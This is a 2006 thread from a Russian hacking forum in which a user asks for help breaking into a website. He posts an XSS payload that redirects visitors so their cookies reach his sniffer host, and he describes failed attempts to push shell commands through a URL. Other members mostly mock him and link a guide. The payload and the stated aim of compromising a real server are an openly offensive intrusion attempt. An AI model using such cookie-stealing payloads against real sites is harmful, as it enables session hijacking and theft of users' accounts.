ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Зашол в тупик при взломе
  #1  
Старый 05.06.2006, 15:07
Аватар для Adio
Adio
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031

Репутация: 71


По умолчанию Зашол в тупик при взломе

У меня тут такая проблема нашол сайт где можно произвести атаку с JavaScript я вставляю javas code
типа <script>document.location='http://antichat.org/s/sniff.gif?'+document.cookie</script>

Оно отсылает cookies на мой сниффер даже когда я просматриваю ту страничку куда я вставил код там есть мой java script code но оно там не сохраняеться т.е после второго захода кода нет я так понял оно через cookies xss работает.. вот пытался сдеать еще
так
<script>document.location='http://myname.narod.ru/get.txt&c=ls%20-l'</script> мне потом пишет что страница не найдена 404. делаю я без линукс каманд
<script>document.location='http://myname.narod.ru/get.txt</script>
выполнякм мой код тоесть в фрейме нажимаю source html вижу свой get.txt так же и с gif файлами...
Так вот что можно замутить с такой штукой стоит Lnix и apache помойму все на perl так вот нужо пробраться еа сервер я так понял только через cookie подделывать и все..? просто я не супер спец в этих делах но так получилось надо очень..
 
Ответить с цитированием

  #2  
Старый 05.06.2006, 22:17
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Я так давно не смеялся))) ГениЙ!))

Автор, читай здесь.
http://forum.antichat.ru/threadedpos...tml#post160263

Там с ошибками, но хоть человек знает, что делать.
 
Ответить с цитированием

  #3  
Старый 05.06.2006, 22:21
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Я плакалЪ...
__________________
..
 
Ответить с цитированием

  #4  
Старый 06.06.2006, 11:58
Аватар для Adio
Adio
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031

Репутация: 71


По умолчанию

Понятно значит у меня пасивная Xss атака только на момент сессии )) При обновление все по местам и не каких Xss гг))) А жаль такой сайтик....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Создание сети: обжимка проводов petrovich-lamer Windows 13 02.07.2007 13:18
Посимвольный перебор в базах данных на примере MySQL LoFFi Чужие Статьи 5 30.04.2007 05:05
Как подстраховать себя при работе с картами r@xpress Чужие Статьи 4 22.04.2006 05:07
Классификация устройств съема информации в телефонной линии novichok Телефония и связь 0 21.04.2006 19:43
О взломе лог файлов Frok Чужие Статьи 5 07.03.2006 23:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ